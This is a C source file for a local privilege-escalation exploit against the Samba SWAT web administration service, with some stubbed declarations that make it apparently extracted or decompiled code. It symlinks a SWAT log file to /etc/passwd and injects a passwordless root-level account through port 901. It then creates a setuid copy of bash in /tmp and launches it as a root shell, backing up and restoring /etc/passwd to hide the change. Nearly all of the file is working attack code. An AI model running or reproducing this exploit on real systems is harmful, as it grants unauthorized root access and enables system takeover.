
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int s_addr ;


 int IPPROTO_TCP ;
 int PF_INET ;
 char* REALLY_FUCKING_LONG_COMMAND ;
 int SOCK_STREAM ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int htons (int) ;
 int inet_addr (char*) ;
 int printf (char*) ;
 int send (int,char*,int,int ) ;
 int socket (int ,int ,int ) ;
 scalar_t__ system (char*) ;
 int unlink (char*) ;

int main(void) {

   int r, s;
   struct sockaddr_in s_addr;

   printf("backing up /etc/passwd\n");
   system("cp -pd /etc/passwd /tmp/.bak");
   system("touch -r /etc/passwd /tmp/.bak");

   if(system("/bin/ln -sf /etc/passwd /tmp/cgi.log") > 0) {
      printf("error, /tmp/cgi.log could not be linked to /etc/passwd\n");
      unlink("/tmp/.bak");
      exit(-1);
   }

   printf("connecting to swat\n");
   s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

   if(s < 0) {
      printf("error, could not create socket\n");
      unlink("/tmp/.bak");
      unlink("/tmp/cgi.log");
      exit(-1);
   }

   s_addr.sin_family = PF_INET;
   s_addr.sin_port = htons(901);
   s_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
   r = connect(s, (struct sockaddr *) &s_addr, sizeof(s_addr));

   if(r==-1) {
      printf("error, cannot connect to swat\n");
      unlink("/tmp/.bak");
      unlink("/tmp/cgi.log");
      exit(-1);
   }

   send(s, "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash\n", 1024, 0);
   close(s);

   if(system("su -l uberhaxr -c \"cp -f /bin/bash /tmp/.swat\"") > 0) {
      printf("exploit failed\n");
      unlink("/tmp/.bak");
      unlink("/tmp/cgi.log");
      exit(-1);
   }

   system("su -l uberhaxr -c \"chmod u+s /tmp/.swat\"");
   printf("restoring /etc/passwd\n");
   system(REALLY_FUCKING_LONG_COMMAND);
   unlink("/tmp/.bak");
   unlink("/tmp/cgi.log");
   printf("got root? (might want to rm /tmp/.swat)\n");
   system("/tmp/.swat");

   return 0;
}
